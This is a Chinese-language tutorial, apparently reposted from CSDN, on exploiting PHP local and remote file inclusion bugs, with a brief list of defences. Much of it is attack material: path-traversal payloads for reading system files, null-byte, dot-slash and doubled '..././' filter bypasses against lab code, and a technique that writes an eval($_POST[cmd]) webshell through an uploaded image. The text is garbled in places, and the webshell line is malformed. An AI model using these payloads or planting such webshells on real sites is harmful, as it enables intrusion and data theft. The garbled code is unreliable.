文件包含漏洞解析
??一、理論
??1.什么是文件包含漏洞?
通過PHP函數(shù)引入文件時,傳入的文件名沒有經(jīng)過合理的驗(yàn)證,從而操作了預(yù)想之外的文件,就可能導(dǎo)致意外的文件泄漏甚至惡意代碼注入。
??2.文件包含漏洞原因
為了代碼更靈活,通常會把被包含的文件設(shè)置為變量?,進(jìn)行動態(tài)調(diào)用?,從而導(dǎo)致客戶端可以調(diào)用任意文件?,造成文件包含漏洞。動態(tài)包含的文件路徑參數(shù),客戶端可控?。web應(yīng)用對用戶的輸入沒有進(jìn)行過濾或者嚴(yán)格過濾就帶入文件包含函數(shù)中執(zhí)行
??3.文件包含函數(shù)
其它用于包含的函數(shù):highlightfile()、 showsource()、 readfile()、 filegetcontents()、 fopen()、file()
??4.文件包含漏洞的分類
?? 4.1本地文件包含(LFI)
指通過相對路徑/絕對路徑 的方式能打開并包含 本地文件的漏洞,大部分情況遇到的文件包含漏洞都是 LFI用戶可以 動態(tài)控制變量。
$filename = $_GET['filename'];include($filename);?
獲取系統(tǒng)中的其他文件內(nèi)容絕對路徑 讀取本地 host 文件
payload:?filename=C:\Windows\System32\drivers\etc\hosts
相對路徑 讀取本地 host 文件
payload:?filename=..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts
包含圖片馬
payload:?filename=./test.jpg
??4.2遠(yuǎn)程文件包含(RFI)
指的是能夠包含遠(yuǎn)程服務(wù)器上的文件并執(zhí)行,可以通過 http(s)或者 ftp 等方式,遠(yuǎn)程加載文件
條件
allow_url_include = On (默認(rèn)為 OFF,需要在 php.ini 中手動打開)allow_url_fopen = On (是否允許打開遠(yuǎn)程文件)用戶可以動態(tài)控制變量
??5.php偽協(xié)議
??6.文件包含漏洞如何防御?
- php中使用open_basedir配置限制訪問在指定的區(qū)域過濾;
- 過濾特殊字符如(點(diǎn))/(正斜杠)\(反斜杠);
- 禁止服務(wù)器遠(yuǎn)程文件包含;
- 盡量不要使用動態(tài)包含,可以在需要包含的頁面固定寫好.
- 配置php.ini配置文件
- 設(shè)置黑白名單
??二、繞過方式
??1、結(jié)合文件上傳漏洞繞過
include("../common/header.php");<!-- from https://pentesterlab.com/exercises/php_include_and_post_exploitation/course -->hint("will include the arg specified in the GET parameter \"page\"");<form action="/LFI-1/index.php" method="GET"><input type="text" name="page"></form>include($_GET["page"]);
這種情況直接包含一個存在的文件就會被當(dāng)做php文件執(zhí)行
利用絕對路徑去讀c盤下的敏感信息:
?page=c://boot.ini
結(jié)合文件上傳漏洞打一套組合拳
思路:例如,你進(jìn)入了某網(wǎng)站的后臺,在修改頭像處可上傳文件,但是圖片上傳限制了后綴名jpg/png,那你就可以上傳一張jpg或者png的圖片馬,即在圖片中寫入php木馬,然后上傳,留意一下上傳的圖片位置,如果該站還存在文件包含漏洞,那么你就可以通過文件包含剛剛你上傳的圖片馬獲取websehll。
?page=../../../../webshell.jpg
和包含的文件類型沒有關(guān)系,都會被當(dāng)做php解析。
??2、00截?cái)嗬@過
include("../common/header.php");<!-- from http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ -->hint("will include the arg specified in the GET parameter \"library\", appends .php to end, escape with NULL byte %00");<form action="/LFI-2/index.php" method="GET"><input type="text" name="library"></form>include("includes/".$_GET['library'].".php");
這種情況,如果你包含一個?library=../../../../webshell.php后臺得到的是?library=../../../../webshell.php.php,顯然這樣并不能被解析。
這個時候我們就可以用%00截?cái)?library=../../../../webshell.php%00后臺得到的是這樣的?library=../../../../webshell.php .php后面那個.php就會被忽略掉了。
??3、點(diǎn)加斜杠繞過
include("../common/header.php");<!-- from http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ -->hint("will include the arg specified in the GET parameter \"file\", looks for .php at end - bypass by apending /. (slash plus dot)");<form action="/LFI-3/index.php" method="GET"><input type="text" name="file"></form>if (substr($_GET['file'], -4, 4) != '.php')echo file_get_contents($_GET['file']);elseecho 'You are not allowed to see source files!'."\n";
讀源碼,我們可以發(fā)現(xiàn),它多了一個判斷,即if (substr($_GET['file'], -4, 4) != '.php')這句代碼的意思是,取文件的后四位,如果不是.php結(jié)尾的就去讀取內(nèi)容,否則輸出You are not allowed to see source files!
繞過思路:我們可以在文件名后面加一個點(diǎn)、斜杠或者%00繞過
?file=../../../../webshell.php.
?file=../../../../webshell.php/.
?file=../../../../webshell.php%00
注意:瀏覽器可能會過濾掉,我們可以用BP抓包修改。
windows文件名不允許包含這些特殊字符,如果你創(chuàng)建一個test.php.得到的是一個test.php后面哪個點(diǎn)會自動抹掉。
??4、去掉后綴名繞過
include("../common/header.php");<!-- from http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ -->hint("will include the arg specified in the GET parameter \"class\", appends .php to end, defeat with NULL byte %00");<form action="/LFI-4/index.php" method="GET"><input type="text" name="class"></form>include('includes/class_'.addslashes($_GET['class']).'.php');
這里關(guān)鍵在于addslashes這個函數(shù)定義和用法addslashes() 函數(shù)返回在預(yù)定義字符之前添加反斜杠的字符串。預(yù)定義字符是:
單引號(')雙引號(")反斜杠(\)NULL
意思就是將這些危險字符前面加反斜杠\轉(zhuǎn)義掉,是一種預(yù)防攻擊的方法。
文件包含的時候去掉后綴.php即可
?class=../../../../phpinfo
??5、雙寫點(diǎn)點(diǎn)杠繞過
<!-- from http://hakipedia.com/index.php/Local_File_Inclusion -->include("../common/header.php");hint("will include the arg specified in the GET parameter \"file\", strips prepended \"../\" strings, must encode / with %2f");<form action="/LFI-5/index.php" method="GET"><input type="text" name="file"></form>$file = str_replace('../', '', $_GET['file']);if(isset($file)){include("pages/$file");}else{include("index.php");}
通過源碼可以看到,他把../替換成了空,這一句:$file = str_replace('../', '', $_GET['file']);
繞過思路:在兩個點(diǎn)之間加../
?file=..././..././..././..././phpinfo.php
??6、method為POST
<?php include("../common/header.php"); ?>
<!-- from https://pentesterlab.com/exercises/php_include_and_post_exploitation/course -->hint("will include the arg specified in the POST parameter \"page\"");<form action="/LFI-6/index.php" method="POST"><input type="text" name="page"></form>include($_POST["page"]);
只不過是提交方式方便,繞過思路同GET。
繞過思路:上傳點(diǎn)如果上傳一張圖片,
內(nèi)容為如下,當(dāng)我們文件包含tupian.jpg的時候,會在同一目錄下(這里的目錄是當(dāng)前根目錄)生成一個shell.php的文件,內(nèi)容為一句話木馬<?php eval($_POST[cmd])?>
?fputs(fopen('shell.php'?'w');?eval($_POST[cmd])');?>文件包含:
?page=../../../../tupian.jpg
然后菜刀連接。
文章轉(zhuǎn)自CSDN,原作者花城的包包,如有親情請聯(lián)系刪除